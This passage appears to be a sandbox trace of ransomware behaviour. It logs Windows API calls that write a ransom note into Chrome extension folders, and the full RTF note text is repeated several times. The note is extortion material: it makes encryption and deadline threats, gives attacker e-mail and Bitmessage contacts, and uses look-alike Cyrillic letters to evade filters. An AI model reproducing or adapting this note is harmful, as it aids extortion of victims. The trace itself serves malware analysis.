nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.211] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.212] CloseHandle (hObject=0x2ec) returned 1 [0291.212] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\#readme_eman#.rtf")) returned 0xffffffff [0291.212] GetLastError () returned 0x2 [0291.212] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.213] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.213] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.213] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 